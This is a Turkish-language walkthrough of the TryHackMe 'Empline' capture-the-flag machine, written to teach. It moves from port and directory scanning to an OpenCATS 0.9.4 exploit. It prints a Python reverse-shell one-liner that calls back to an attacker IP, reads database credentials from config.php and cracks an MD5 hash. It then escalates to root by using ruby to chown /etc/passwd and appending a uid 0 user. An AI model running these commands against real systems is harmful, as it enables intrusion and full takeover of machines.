Merhabalar bu yazımda Tryhackme Empline Makine Çözümü sizler için çözeceğim.
- Makine İsmi: Empline
- Zorluk: Başlangıç-Orta
- Makine Linki: https://tryhackme.com/room/empline
1- Web sitesini incelediğimde empline.thm ve job.empline.thm olarak bir subdomain olarak da tespit etmiş olduk. Şimdi Host ile ip adresini eşleştirerek makineyi çözmeye başlayalım.
2- sudo nano /etc/hosts yazarak terminalden host içerisine geçiş yaptık.
Makine ip adresini ve yanına ayrı ayrı web sitesi olarak ekledik Ctrl+x yaptık ve E kaydet diyerek kaydedip çıktık.
3- Detaylı olarak tarama yaptım ve 22,80,3306 mysql olarak portların açık olduğunu tespit ettim. Veri tabanı üzerinde araştırdığımda bir açığa rastlamadım. 3306 portunda bir açık yok maalesef.
4- Gobuster ile dizinleri taradım ama işe yarar bir şey elde edemedim. Farklı olarak nmap ve nikto ile de taramaya devam ediyorum.
5- Nikto ile baktığımızda bir şey elde edemedik. Bizim tespit ettiğimizden farklı olarak bir şey çıkmadı.
6- job.empline.thm içerisine gittiğimde opencats giriş paneli karşılıyor.
Altında 0.9.4 versiyonu olduğunu görüyoruz araştırmaya başlıyorum belki bir exploit bulabiliriz.
7- Github içerisinde opencats 0.9.4 açığına özel olarak yazılmış bash bir araç buldum.
Çalıştırıp ilgili linki verdiğimizde otomatik olarak exloit ediyor ve direkt bash kabuğu açıyor.
İlgili Link: https://github.com/Nickguitar/RevCAT
8- git clone https://github.com/Nickguitar/RevCAT.git yazarak Masaüstüne indirdim.
İçerisine geçiş yapıp yetki veriyoruz.
Daha sonra çalıştırıp giriş panelinin olduğu subdomaini verdik ve direkt makinenin içerisindeyiz.
9- Öncelikle ncat -lvnp 9001 yazarak bağlantıyı dinlemeye başlayalım.
Vpn ip adresinizi ayarlayın ve port kısmına ellemeden geçin. Enter yaptığınızda artık yeni bir terminalde açık olarak bağlantı gelecektir.
export RHOST=”10.10.10.10″;export RPORT=9001;python3 -c ‘import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(“sh”)’
10- Direkt bağlantı geldi. Bash kabuğuna geçiş yaptık.
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
İlginizi çekebilecek yazımız: Tryhackme Ollie Makine Çözümü
11- Opencat içerisine geçiş yaptım ve config.php okudum ve veri tabanı bilgilerini ulaştık.
12- Giriş yaptık, opencats olan veri tabanını seçerek devam ediyorum.
13- Sıra sıra devam ettim ve user bilgilerine ulaşmış olduk. Tek tek kırmaya çalışacağım.
14- Online hash üzerinden MD5 şifrelemeyi kırdım. Artık ssh üzerinden George kullanıcısının içerisine geçiş yapabiliriz.
15- Evet direkt içerisindeyiz.
16- User.txt bulduk ve ilk bayrağımızı tespit etmiş olduk. Şimdi yetki yükseltmeye çalışalım.
17- Kendi makinem üzerinden Linpeas.sh yükledim ve çalıştırdım. Yetki yükseltmek için ruby kullanabiliriz.
Deneyelim ve bakalım.
18- Sırasıyla;
- nano siberguvenlik.rb diyerek boş düzenleme yeri açtık.
- file = File.new(“/etc/passwd” , “r”)
- file.chown(1002, 1002)
yazıp Ctrl+x ve daha sonra E yani evet diyerek kaydedip çıktık.
Burada etc/passwd içerisini düzenleyip değiştirmek için George kullanıcısına yetki vermiş olduk.
19- Şimdi nano /etc/passwd yazarak kullanıcıların olduğunu düzenlemeyi açtık.
En alta gelip;
- siberguvenlik:$6$VqGH4wh.uVrMcVFH$kfY7swCQA//Vrr6lvTr8eLyWTBti5R7WgGtt0me8TSd8x2NhFoATWcWKgRnB1cOUj2AZdCYPaB0SexMJRSZYM.:0:0:root:/root:/bin/bash
Ekleyip Ctrl+x sonra E diyerek kaydedip çıkıyoruz.
Buraya kullanıcı olarak siberguvenlik şifre olarak siber guvenlik eklemiş olduk. En sona da eklediğimiz root kullanıcısı olarak eklemiş gösteriyoruz ve bin/bash olarak direkt şifreyi girdiğimizde bizi tam yetkili olarak oku diyoruz.
- su siberguvenlik
- password: siberguvenlik
Yazıp enter yaptığımızda direkt olarak root içerisine geçiş yapıyoruz.
Son bayrağı da tespit ettik ve Tryhackme Empline Makine Çözümü yazımızın sonuna gelmiş bulunuyoruz.